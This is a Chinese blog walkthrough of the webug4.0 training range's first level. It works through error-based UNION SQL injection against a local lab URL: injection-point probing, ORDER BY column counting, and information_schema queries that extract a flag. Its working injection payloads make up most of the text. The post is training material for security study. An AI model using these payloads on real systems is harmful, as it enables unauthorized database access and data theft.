首页 > 其他分享 >webug4.0显错注入

webug4.0显错注入

时间:2024-01-26 16:33:09浏览次数:27  
标签:显错 name 23 union webug4.0 table id select 注入

首先访问:http://192.168.195.139/control/sqlinject/manifest_error.php?id=1

进入到这个靶场可以通过在url栏id=1处改数字、加单引号、#号、*号等等来判断注入点。
如改成id=2,就会出现以下结果

如果改成id=1) 括号无反应,看来是屏蔽了
id=1" 双引号无反应
id=1'单引号有结果,id=1'就会出现

接着就可以使用二分法来去判断字段数
id=1' order by 5 %23,利用二分法判断,3、5均报错
(mysql有三种注释方法,1、# … 2、-- … 3、/…/,%23是#的url表示)

然而id=1' order by 2 %23正确,可以返回界面。说明字段是2

测到查询结果为两列,接下来看看我们想要的数据在第几列
id=1' union select 1,2 %23

说明会回显第二列的内容,那我们可以通过替换第二列的内容去获取数据库的相关信息。
通过id=3' union select 1,version() %23可以知道数据库版本信息

id=3' union select 1,database() %23可以知道当前的数据库名

查询数据库webug中的表
id=3' union select 1,group_concat(table_name)from information_schema.table where table_schema='webug' %23

查询之后可以发现webug数据库中有个flag数据表
通过id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' %23或者id=3' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' %23
查询flag表中的字段

通过查询flag表中的内容,我们可以知道里面有id,flag两个字段。我们可以使用id=3' union select 1,flag from webug,flag %23

至此webug靶场的第一关显错注入就完成了。
查看当前数据库下有哪些表
id=3' union select 1,group_concat(table_name)from information_schema.tables where table_schema='webug' %23

查看env_list表里有几列
id=3' union select 1,group_concat(column_name)from information_schema.columns where table_name='env_list' and table_schema='webug' %23

查看envFlag下的内容
id=3' union select 1,envFlag from env_list where id=1 %23

标签:显错,name,23,union,webug4.0,table,id,select,注入
From: https://www.cnblogs.com/yolovictory/p/17989673

相关文章

  • Go语言官方团队推荐的依赖注入工具
    在开发过程中,我们经常需要处理一些相互依赖的组件。例如,我们可能有一个服务需要数据库连接和一些配置信息。这种相互依赖的关系在一个大型项目中可能会变得非常复杂。无序地组织这些依赖可能会造成代码的混乱和维护困难。为了更好地管理依赖关系,依赖注入是一个很好的解决方案。在G......
  • SQL注入详解
    一、SQL注入注入攻击的本质,是把用户输入的数据当做代码执行。这里有两个关键条件,第一个是用户能够控制输入;第二个是原本程序要执行的代码,拼接了用户输入的数据。varsql="select*fromtableNamewherename='"+"test"+"'";这个“拼接”的过程很重要,正是这个拼......
  • 【python】SSTI模版注入
    0x00  PythonVene环境及介绍venv虚拟环境:创建和管理虚拟环境的模块首先aptupdate更新一下包管理安装你当前版本的python-venv选择一个目录,安装venv虚拟环境。我取的名是flask-venv。如何选中当前的venv呢?执行以下命令可以发现多了一个前缀flask-venv在当前目录安装f......
  • 代理对象执行私有方法导致注入的属性为null
    代码如下:@ServicepublicclassPerformanceServiceImplimplementsIPerformanceService{privatefinalstaticLoggerlogger=LoggerFactory.getLogger(PerformanceServiceImpl.class);@ResourcePerformanceDaoperformanceDao;@Override......
  • .NET 6 ASP.NET Core API 项目依赖注入一个全局对象,确保全局只实例化一次,调用的都是此
    在.NET6中,实现全局单例服务的方法是通过内置在ASP.NETCore中的依赖注入(DI)容器来完成的。DI容器负责创建和管理服务的实例,包括控制它们的生命周期。对于单例服务,DI容器将确保在应用程序的整个生命周期内只创建服务的一个实例,并且所有对该服务的请求都会返回这个单一的实例。以下......
  • Perplexity AI:给搜索引擎注入了新的生命力
    Ai工具集导航(Ai-321.com)新时代的互联网世界中,搜索引擎被誉为“王冠顶上的明珠”。毕竟,百度和谷歌这两大巨头在两岸三地都享有举足轻重的地位。然而,随着AI大模型的崛起,AI赋能搜索引擎已经成为业界的新潮流。国内市场上,昆仑万维的天工AI搜索成为瞩目的新秀;而在海外,则有AI搜索初创公司......
  • spring yml注入属性,单元测试失败
    spring——boot菜的一笔的错误今天在学springboot的时候看视频没仔细看结果就悲剧了?真他妈坑啊一开始是这样的由于我是用的maven项目没有使用因此我的pom文件里面并没有补这个依赖他妈的下载这个又花了我好久,等我下载完之后,接着又来问题了原来这个要和springboot那个类在同一......
  • 如何防护网站存在的sql注入攻击漏洞
    SQL注入攻击是最危险的Web漏洞之一,危害性极大,造成的后果不堪设想,因此受到了大家的高度重视。那么你知道SQL注入攻击防范方法有哪些吗?SQL注入是一种网站的攻击方法。它将SQL代码添加到网站前端GETPOST参数中,并将其传递给mysql数据库进行分析和执行语句攻击。它是一种利用应用程序......
  • Web安全-SQL注入常用函数(二)
    ★★实战前置声明★★文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。1、MySQL数据库构成初始化安装MySQL数据库后(基于MySQL版本5.7.x),默认会创建4个系统数据库:#默认......
  • 常见sql注入绕过方法
    常见sql注入绕过方法目录常见sql注入绕过方法1、空格过滤绕过漏洞代码示例/**/绕过制表符绕过换行符绕过括号绕过`反引号绕过2、内联注释绕过【常见waf!!!】3、大小写绕过4、双写关键字绕过5、编码绕过漏洞示例代码双重URL编码绕过十六进制编码绕过Unicode编码绕过ASCII编码绕过6......